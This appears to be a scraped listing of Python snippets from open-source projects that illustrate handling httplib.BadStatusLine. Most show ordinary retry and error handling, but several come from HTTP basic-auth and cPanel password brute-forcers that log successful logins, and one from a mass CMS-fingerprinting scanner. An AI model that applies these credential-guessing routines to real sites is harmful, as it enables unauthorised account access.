The following 50 code examples, extracted from open-source Python projects, illustrate how to use httplib.BadStatusLine().
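Before the examples: httplib.BadStatusLine (http.client.BadStatusLine in Python 3) is raised when HTTPConnection reads a status line it cannot parse, which usually means the server closed the connection or returned something that is not an HTTP response. As a quick orientation, a minimal sketch of catching it might look like the following; the fetch_status helper and its host/path arguments are placeholders for illustration, not part of any project below.

import httplib  # Python 2; on Python 3 this class lives in http.client

def fetch_status(host, path="/"):
    """Return the HTTP status code, or None if the server sent a malformed status line."""
    conn = httplib.HTTPConnection(host, timeout=10)
    try:
        conn.request("GET", path)
        return conn.getresponse().status
    except httplib.BadStatusLine:
        # The server closed the connection or replied with something that is
        # not a valid "HTTP/x.y <code> <reason>" status line.
        return None
    finally:
        conn.close()

The examples that follow apply the same pattern in context: wrap the request in try/except and either retry, fall back to another transport, or ignore the failure.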
def request(self, host, handler, request_body, verbose=0):
    #retry request once if cached connection has gone cold
    for i in (0, 1):
        try:
            return self.single_request(host, handler, request_body, verbose)
        except socket.error, e:
            if i or e.errno not in (errno.ECONNRESET, errno.ECONNABORTED, errno.EPIPE):
                raise
        except httplib.BadStatusLine: #close after we sent request
            if i:
                raise

##
# Send a complete request, and parse the response.
#
# @param host Target host.
# @param handler Target PRC handler.
# @param request_body XML-RPC request body.
# @param verbose Debugging flag.
# @return Parsed response.
def run(self):
    username, password = getword()
    try:
        print "-"*12
        print "User:",username,"Password:",password
        req = urllib2.Request(sys.argv[1])
        passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
        passman.add_password(None, sys.argv[1], username, password)
        authhandler = urllib2.HTTPBasicAuthHandler(passman)
        opener = urllib2.build_opener(authhandler)
        fd = opener.open(req)
        print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n"
        print "Retrieved", fd.geturl()
        info = fd.info()
        for key, value in info.items():
            print "%s = %s" % (key, value)
        sys.exit(2)
    except (urllib2.HTTPError, httplib.BadStatusLine, socket.error), msg:
        print "An error occurred:", msg
        pass
def get_target():
    global client, db
    cursor = db.Shodita.find({"bot":"Shizuka"})
    for document in cursor:
        if check_domain_mongodb(document["ip"], document["dominio"]):
            print colores.verde + "[INFO] Domain: " + document["dominio"] + " already scanned" + colores.normal
            pass
        else:
            url = "http://" + document["dominio"]
            headers = {'User-Agent' : 'Mozilla 5.10'}
            request = Request(url, None, headers)
            try:
                response = urlopen(request, timeout=10)
                if response.code == 200 or response.code == "OK":
                    html = response.read()
                    if detect_wp(html, document["dominio"]) == True:
                        insert_mongodb("WordPress", document["dominio"], document["ip"])
                        print colores.verde + "[+][INFO] " + document["dominio"] + " is WordPress" + colores.normal
                    if detect_joomla(html):
                        insert_mongodb("Joomla", document["dominio"], document["ip"])
                        print colores.verde + "[+][INFO] " + document["dominio"] + " is Joomla" + colores.normal
                    if detect_drupal(html):
                        insert_mongodb("Drupal", document["dominio"], document["ip"])
                        print colores.verde + "[+][INFO] " + document["dominio"] + " is Drupal" + colores.normal
            except URLError, e:
                continue
            except httplib.BadStatusLine:
                continue
            except:
                continue
def quit(self): """Quits the driver and close every associated window.""" try: RemoteWebDriver.quit(self) except (http_client.BadStatusLine, socket.error): # Happens if Firefox shutsdown before we've read the response from # the socket. pass if "specificationLevel" in self.capabilities: self.service.stop() else: self.binary.kill() try: shutil.rmtree(self.profile.path) if self.profile.tempfolder is not None: shutil.rmtree(self.profile.tempfolder) except Exception as e: print(str(e))
def create_tcp_connection(self, hostname, port, timeout, **kwargs):
    sock = socket.create_connection((self.proxy_host, int(self.proxy_port)))
    if hostname.endswith('.appspot.com'):
        hostname = 'www.google.com'
    request_data = 'CONNECT %s:%s HTTP/1.1\r\n' % (hostname, port)
    if self.proxy_username and self.proxy_password:
        request_data += 'Proxy-Authorization: Basic %s\r\n' % base64.b64encode(('%s:%s' % (self.proxy_username, self.proxy_password)).encode()).decode().strip()
    request_data += '\r\n'
    sock.sendall(request_data)
    response = httplib.HTTPResponse(sock)
    response.fp.close()
    response.fp = sock.makefile('rb', 0)
    response.begin()
    if response.status >= 400:
        raise httplib.BadStatusLine('%s %s %s' % (response.version, response.status, response.reason))
    return sock
def quit(self): """Quits the driver and close every associated window.""" try: RemoteWebDriver.quit(self) except (http_client.BadStatusLine, socket.error): # Happens if Firefox shutsdown before we've read the response from # the socket. pass if self.w3c: self.service.stop() else: self.binary.kill() if self.profile is not None: try: shutil.rmtree(self.profile.path) if self.profile.tempfolder is not None: shutil.rmtree(self.profile.tempfolder) except Exception as e: print(str(e))
def ssl_checker(self, domain):
    domain_fix = "https://{}".format(domain)
    try:
        # Skip SSL Verification Check!
        # https://stackoverflow.com/questions/27835619/ssl-certificate-verify-failed-error
        gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)  # Only for gangstars
        data = urllib2.urlopen("https://{}".format(domain), timeout=25, context=gcontext)
        if "ERROR" in data or "Errno" in data:
            domain_fix = "http://{}".format(domain)
    except urllib2.HTTPError, e:
        pass
    except urllib2.URLError, e:
        domain_fix = "http://{}".format(domain)
    except ssl.SSLError as e:
        domain_fix = "http://{}".format(domain)
    except httplib.BadStatusLine:
        domain_fix = "http://{}".format(domain)
    return domain_fix
def URL_to_HTML(URL):
    try:
        HTML = urllib2.urlopen(URL)
    except urllib2.HTTPError as error:
        print u'HTTPError: {0} ({1})'.format(URL, error.code)
    except urllib2.URLError as error:
        print u'URLError: {0} ({1})'.format(URL, error.reason)
    except httplib.BadStatusLine as error:
        print u'BadStatusLine: {}'.format(URL)
    except SocketError as error:
        if error.errno != errno.ECONNRESET:
            raise
        pass
    else:
        Charset = HTML.headers['content-type'][HTML.headers['content-type'].index('=') + 1:]
        HTML = unicode(HTML.read(), Charset)
        return HTML
def test_status_lines(self):
    # Test HTTP status lines
    body = "HTTP/1.1 200 Ok\r\n\r\nText"
    sock = FakeSocket(body)
    resp = httplib.HTTPResponse(sock)
    resp.begin()
    self.assertEqual(resp.read(0), '')  # Issue #20007
    self.assertFalse(resp.isclosed())
    self.assertEqual(resp.read(), 'Text')
    self.assertTrue(resp.isclosed())

    body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
    sock = FakeSocket(body)
    resp = httplib.HTTPResponse(sock)
    self.assertRaises(httplib.BadStatusLine, resp.begin)
def pcl_put(options, source, target):
    """Retry wrapper around the file upload helper (pcl_put_retry)."""
    pcl_verbose("Transfer: {0} ({1}) -> {2}".format(source, pcl_human(os.path.getsize(source)), target), options.verbose)
    retry = 0
    while True:
        try:
            pcl_put_retry(options, source, target)
            break
        except (pclURLError, pclBadStatusLine, pclCannotSendRequest, ssl.SSLError, socket.error, pclError) as e:
            pcl_can_query_retry(e)
            retry += 1
            pcl_debug("Retry {0}/{1}: {2}".format(retry, options.retries, e), options.debug)
            if retry >= options.retries:
                raise pclError(1, e)
            time.sleep(options.delay)
def pcl_get(options, source, target):
    """Retry wrapper around the file download helper (pcl_get_retry)."""
    pcl_verbose("Transfer: {0} -> {1}".format(source, target), options.verbose)
    retry = 0
    while True:
        try:
            pcl_get_retry(options, source, target)
            break
        except (pclURLError, pclBadStatusLine, pclCannotSendRequest, ssl.SSLError, socket.error, pclError) as e:
            pcl_can_query_retry(e)
            retry += 1
            pcl_debug("Retry {0}/{1}: {2}".format(retry, options.retries, e), options.debug)
            if retry >= options.retries:
                raise pclError(1, e)
            time.sleep(options.delay)
def _request(self, method, path, postdata):
    '''
    Do a HTTP request, with retry if we get disconnected (e.g. due to a timeout).
    This is a workaround for https://bugs.python.org/issue3566 which is fixed in Python 3.5.
    '''
    headers = {'Host': self.__url.hostname,
               'User-Agent': USER_AGENT,
               'Authorization': self.__auth_header,
               'Content-type': 'application/json'}
    try:
        self.__conn.request(method, path, postdata, headers)
        return self._get_response()
    except httplib.BadStatusLine as e:
        if e.line == "''":  # if connection was closed, try again
            self.__conn.close()
            self.__conn.request(method, path, postdata, headers)
            return self._get_response()
        else:
            raise
def processTarget(self, t, port):
    if not self.seentarget(t + str(port)):
        self.addseentarget(t + str(port))
        self.display.verbose(self.shortName + " - Connecting to " + t)
        try:
            conn = httplib.HTTPConnection(t, port, timeout=10)
            conn.request('GET', '/')
            response = conn.getresponse()
            serverver = response.getheader('server')
            if (serverver):
                outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(
                    port) + "_" + Utils.getRandStr(10)
                Utils.writeFile("Identified Server Version of %s : %s\n\nFull Headers:\n%s" % (
                    t, serverver, self.print_dict(response.getheaders())), outfile)
                kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
        except httplib.BadStatusLine:
            pass
        # except socket.error as e:
        except:
            pass
def test_handle_script_request_unexpected_instance_exception(self):
    self.servr._instance_factory.new_instance(
        mox.IgnoreArg(), expect_ready_request=False).AndReturn(self.inst)
    self.inst.start()
    self.inst.handle(
        self.environ, self.start_response, self.url_map, self.match,
        self.request_id,
        instance.INTERACTIVE_REQUEST).AndRaise(httplib.BadStatusLine('line'))
    self.mox.ReplayAll()
    self.assertRaises(
        httplib.BadStatusLine,
        self.servr._handle_script_request,
        self.environ,
        self.start_response,
        self.url_map,
        self.match,
        self.request_id)
    self.mox.VerifyAll()
def fetchsamples(limit):
    ret = []
    url = "https://stream.twitter.com/1/statuses/sample.json"
    parameters = []
    while len(ret) < limit:
        try:
            response = twitterreq(url, "GET", parameters)
            for line in response:
                ret.append(line.strip())
                if len(ret) % 100 == 0:
                    print len(ret)
                if len(ret) >= limit:
                    break
        except IncompleteRead:
            pass
        except BadStatusLine:
            pass
    return ret

# filter tweets for images / good captions and output them to file
def request(self, url, query, headers, timeout):
    request = Request(url, query.encode('utf-8'), headers)
    try:
        if (sys.version_info[0] == 2 and sys.version_info[1] > 5) or sys.version_info[0] > 2:
            response = self.http_opener.open(request, timeout=timeout)
        else:
            response = self.http_opener.open(request)
    except HTTPError as error:
        if error.fp is None:
            raise HTTPHandlerError(error.filename, error.code, error.msg, dict(error.hdrs))
        else:
            raise HTTPHandlerError(error.filename, error.code, error.msg, dict(error.hdrs), error.read())
    except URLError as error:
        # urllib2.URLError documentation is horrendous!
        # Try to get the tuple arguments of URLError
        if hasattr(error.reason, 'args') and isinstance(error.reason.args, tuple) and len(error.reason.args) == 2:
            raise HTTPHandlerError(httpcode=error.reason.args[0], httpmsg=error.reason.args[1])
        else:
            raise HTTPHandlerError(httpmsg='urllib2.URLError: %s' % (error.reason))
    except BadStatusLine as error:
        raise HTTPHandlerError(httpmsg='httplib.BadStatusLine: %s' % (error.line))
    return response.read().decode('utf-8')
def _post(self, url, body, headers):
    _headers = self.auth_headers.copy()
    _headers.update(headers)
    attempts = self.max_retries + 1
    while attempts > 0:
        try:
            self.conn.request('POST', url, body.encode('UTF-8'), _headers)
            return check_response_status(self.conn.getresponse())
        except (socket.error, httplib.ImproperConnectionState, httplib.BadStatusLine):
            # We include BadStatusLine as they are spurious
            # and may randomly happen on an otherwise fine
            # Solr connection (though not often)
            self._reconnect()
            attempts -= 1
            if attempts <= 0:
                raise
def __wait_for_disappearing(cls):
    t = 0
    while t < 120:
        t = t + 1
        try:
            elements = env.threadlocal.BROWSER.find_elements(cls.by, cls.value)
        except NoSuchElementException:
            log.step_normal("Element [%s]: NoSuchElementException." % cls.__name__)
            elements = []
        except BadStatusLine:
            log.step_warning("Element [%s]: BadStatusLine." % cls.__name__)
            continue
        except UnexpectedAlertPresentException:
            log.step_warning("Element [%s]: UnexpectedAlertPresentException." % cls.__name__)
        if len(elements) == 0:
            return True
        else:
            time.sleep(0.5)
            log.step_normal("Element [%s]: WairForDisappearing... Found [%s] Element. Tried [%s] Times." % (cls.__name__, len(elements), t))
    return False
def make_request(self, request):
    """ makes a request and returns an object with the result """
    res = {}
    res['type'] = 'unknown'
    try:
        response = self.opener.open(request)
    except urllib2.HTTPError as error:
        res['content'] = error.read()
        res['cookie'] = ''
        res['succeed'] = False
    except urllib2.URLError as error:
        res['content'] = str(error)
        res['cookie'] = ''
        res['succeed'] = False
    except httplib.BadStatusLine as error:
        res['content'] = str(error)
        res['cookie'] = ''
        res['succeed'] = False
    else:
        res = Session.transform_content_to_response(response)
    return res
def geturls(url):
    try:
        print "[+] Collecting:",url
        page = urllib2.urlopen(url).read()
        links = re.findall(('http://\w+.\w+\.\w+[/\w+.]*[/.]\w+'), page)
        for link in links:
            if link not in urls and link[-3:].lower() not in ("gif","jpg","png","ico"):
                urls.append(link)
    except(IOError,TypeError,AttributeError,httplib.BadStatusLine,socket.error):
        pass
    return urls
def getauth(site):
    print "[-] Checking Authentication:",site
    global hits
    try:
        req = urllib2.Request(site)
        handle = urllib2.urlopen(req)
        if site in urls:
            print "Removing:",site
            urls.remove(site)
    except(IOError,urllib2.URLError,urllib2.HTTPError,httplib.BadStatusLine,socket.error), msg:
        print "\t- Got:",msg,"\n"
        try:
            if hasattr(msg, 'code') or msg.code == 401:
                authline = msg.headers.get('www-authenticate', '')
                if authline:
                    print "[+]",authline
                    print "[+] Found site using basic authentication"
                    print "[+] Attempting Brute Force on",site,"\n"
                    hits +=1
                    for i in range(len(words)*len(users)):
                        work = threading.Thread()
                        work.setDaemon(1)
                        work.start()
                        threader(site)
                        time.sleep(1)
        except(AttributeError):
            pass
    else:
        print "\t- Got: 200\n"
def threader(site):
    username, password = getword()
    global logins
    try:
        print "-"*12
        print "User:",username,"Password:",password
        req = urllib2.Request(site)
        passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
        passman.add_password(None, site, username, password)
        authhandler = urllib2.HTTPBasicAuthHandler(passman)
        opener = urllib2.build_opener(authhandler)
        fd = opener.open(req)
        site = urllib2.urlopen(fd.geturl()).read()
        print "\n[+] Checking the authenticity of the login...\n"
        if not re.search(('denied'), site.lower()):
            print "\t\n\n[+] Username:",username,"Password:",password,"----- Login successful!!!\n\n"
            print "[+] Writing Successful Login:",sys.argv[5],"\n"
            logins +=1
            file = open(sys.argv[5], "a")
            file.writelines("Site: "+site+" Username: "+username+ " Password: "+password+"\n")
            file.close()
            print "Retrieved", fd.geturl()
            info = fd.info()
            for key, value in info.items():
                print "%s = %s" % (key, value)
        else:
            print "- Redirection"
    except (urllib2.HTTPError, httplib.BadStatusLine,socket.error), msg:
        print "An error occurred:", msg
        pass
def run(self):
    username, password = getword()
    try:
        print "-"*12
        print "User:",username,"Password:",password
        auth_handler = urllib2.HTTPBasicAuthHandler()
        auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1])
        opener = urllib2.build_opener(auth_handler)
        urllib2.install_opener(opener)
        urllib2.urlopen(server)
        print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n"
    except (urllib2.HTTPError, httplib.BadStatusLine), msg:
        #print "An error occurred:", msg
        pass
def getauth(site, users):
    print "[-] Checking Authentication:",site
    global hits
    try:
        req = urllib2.Request(site)
        handle = urllib2.urlopen(req)
        if site in urls:
            print "Removing:",site
            urls.remove(site)
    except(IOError,urllib2.URLError,urllib2.HTTPError,httplib.BadStatusLine,socket.error), msg:
        print "\t- Got:",msg,"\n"
        try:
            if hasattr(msg, 'code') or msg.code == 401:
                authline = msg.headers.get('www-authenticate', '')
                if authline:
                    print "[+]",authline
                    print "[+] Found site using basic authentication"
                    domain = site[7:].split("/",3)[0]
                    print "[+] Collecting users from Google:",domain,"\n"
                    getusers(domain)
                    print "[+] Attempting Brute Force on",site,"\n"
                    hits +=1
                    for i in range(len(words)*len(users)):
                        work = threading.Thread()
                        work.setDaemon(1)
                        work.start()
                        threader(site)
                        time.sleep(1)
                    print len(users)
                    print "[+] Removing last collected users\n"
                    users = users[:-int(erase)]
                    print len(users)
        except(AttributeError):
            pass
    else:
        print "\t- Got: 200\n"
def threader(site):
    username, password = getword()
    global logins
    try:
        print "-"*12
        print "User:",username,"Password:",password
        req = urllib2.Request(site)
        passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
        passman.add_password(None, site, username, password)
        authhandler = urllib2.HTTPBasicAuthHandler(passman)
        opener = urllib2.build_opener(authhandler)
        fd = opener.open(req)
        site = urllib2.urlopen(fd.geturl()).read()
        print "\n[+] Checking the authenticity of the login...\n"
        if not re.search(('denied'), site.lower()):
            print "\t\n\n[+] Username:",username,"Password:",password,"----- Login successful!!!\n\n"
            print "[+] Writing Successful Login:",sys.argv[5],"\n"
            logins +=1
            file = open(sys.argv[5], "a")
            file.writelines("Site: "+site+" Username: "+username+ " Password: "+password+"\n")
            file.close()
            print "Retrieved", fd.geturl()
            info = fd.info()
            for key, value in info.items():
                print "%s = %s" % (key, value)
        else:
            print "- Redirection\n"
    except (urllib2.HTTPError,httplib.BadStatusLine,socket.error), msg:
        print "An error occurred:", msg
        pass
def getresponse(self):
    _MyHTTPBadStatusConnection.num_calls += 1
    raise httplib.BadStatusLine("")
def testBadStatusLineRetry(self):
    old_retries = httplib2.RETRIES
    httplib2.RETRIES = 1
    self.http.force_exception_to_status_code = False
    try:
        response, content = self.http.request("http://bitworking.org",
                                              connection_type=_MyHTTPBadStatusConnection)
    except httplib.BadStatusLine:
        self.assertEqual(2, _MyHTTPBadStatusConnection.num_calls)
    httplib2.RETRIES = old_retries
def quit(self): """ Closes the browser and shuts down the SafariDriver executable that is started when starting the SafariDriver """ try: RemoteWebDriver.quit(self) except http_client.BadStatusLine: pass finally: self.service.stop()
def request(self, host, handler, request_body, verbose=0):
    """Send XMLRPC request"""
    uri = '{scheme}://{host}{handler}'.format(scheme=self._scheme,
                                              host=host, handler=handler)

    if self._passmgr:
        self._passmgr.add_password(None, uri, self._username,
                                   self._password)
    if self.verbose:
        _LOGGER.debug("FabricTransport: {0}".format(uri))

    opener = urllib2.build_opener(*self._handlers)

    headers = {
        'Content-Type': 'text/xml',
        'User-Agent': self.user_agent,
    }
    req = urllib2.Request(uri, request_body, headers=headers)

    try:
        return self.parse_response(opener.open(req))
    except (urllib2.URLError, urllib2.HTTPError) as exc:
        try:
            code = -1
            if exc.code == 400:
                reason = 'Permission denied'
                code = exc.code
            else:
                reason = exc.reason
            msg = "{reason} ({code})".format(reason=reason, code=code)
        except AttributeError:
            if 'SSL' in str(exc):
                msg = "SSL error"
            else:
                msg = str(exc)
        raise InterfaceError("Connection with Fabric failed: " + msg)
    except BadStatusLine:
        raise InterfaceError("Connection with Fabric failed: check SSL")
def provision_eos(port, username, password):
    connection = pyeapi.client.connect(
        transport='https',
        host='localhost',
        username='vagrant',
        password='vagrant',
        port=port
    )
    device = pyeapi.client.Node(connection)

    commands = list()
    commands.append('configure session')
    commands.append('rollback clean-config')

    with open('../eos/initial.conf', 'r') as f:
        lines = f.readlines()

    for line in lines:
        line = line.strip()
        if line == '':
            continue
        if line.startswith('!'):
            continue
        commands.append(line)

    commands[-1] = 'commit'

    try:
        device.run_commands(commands)
    except httplib.BadStatusLine:
        # This actually means everything went fine
        print_info_message()
def fetch(self, method, host, path, headers, payload, bufsize=8192, timeout=20):
    request_data = '%s %s HTTP/1.1\r\n' % (method, path)
    request_data += ''.join('%s: %s\r\n' % (k, v) for k, v in headers.items())
    request_data += '\r\n'
    #print("request:%s" % request_data)
    #print("payload:%s" % payload)

    conn = self.get_conn()
    if not conn:
        logging.warn("get sock fail")
        return

    if len(request_data) + len(payload) < 1300:
        payload = request_data.encode() + payload
    else:
        conn.sock.send(request_data.encode())

    payload_len = len(payload)
    start = 0
    while start < payload_len:
        send_size = min(payload_len - start, 65535)
        sended = conn.sock.send(payload[start:start+send_size])
        start += sended

    conn.sock.settimeout(timeout)
    response = httplib.HTTPResponse(conn.sock, buffering=True)
    response.conn = conn
    try:
        #orig_timeout = conn.sock.gettimeout()
        #conn.sock.settimeout(timeout)
        response.begin()
        #conn.sock.settimeout(orig_timeout)
    except httplib.BadStatusLine as e:
        logging.warn("fetch bad status line:%r", e)
        response = None
    except Exception as e:
        logging.warn("fetch:%r", e)
    return response